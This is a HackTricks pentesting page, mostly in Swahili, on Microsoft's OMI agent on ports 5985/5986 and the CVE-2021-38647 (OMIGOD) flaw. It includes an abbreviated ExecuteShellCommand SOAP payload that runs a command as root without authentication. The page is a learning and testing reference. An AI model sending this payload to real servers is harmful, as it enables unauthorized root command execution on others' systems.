4.2 KiB
5985,5986 - Pentesting OMI
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
OMI inawasilishwa kama chombo open-source na Microsoft, kilichoundwa kwa ajili ya usimamizi wa usanidi wa mbali. Ni muhimu hasa kwa seva za Linux kwenye Azure zinazotumia huduma kama:
- Azure Automation
- Azure Automatic Update
- Azure Operations Management Suite
- Azure Log Analytics
- Azure Configuration Management
- Azure Diagnostics
Mchakato omiengine unazinduliwa na kusikiliza kwenye interfaces zote kama root wakati huduma hizi zinapowashwa.
Bandari za kawaida zinazotumika ni 5985 (http) na 5986 (https).
CVE-2021-38647 Vulnerability
Kama ilivyobainika tarehe 16 Septemba, seva za Linux zilizowekwa kwenye Azure zikiwa na huduma zilizoelezwa zinaweza kuathirika kutokana na toleo dhaifu la OMI. Uthibitisho huu uko katika usimamizi wa ujumbe wa seva ya OMI kupitia kiunganishi cha /wsman bila kuhitaji kichwa cha Uthibitisho, ikidhihirisha mteja vibaya.
Mshambuliaji anaweza kutumia hii kwa kutuma payload ya "ExecuteShellCommand" SOAP bila kichwa cha Uthibitisho, ikilazimisha seva kutekeleza amri kwa haki za root.
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
Kwa maelezo zaidi kuhusu CVE angalia hii.
Marejeo
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
- https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.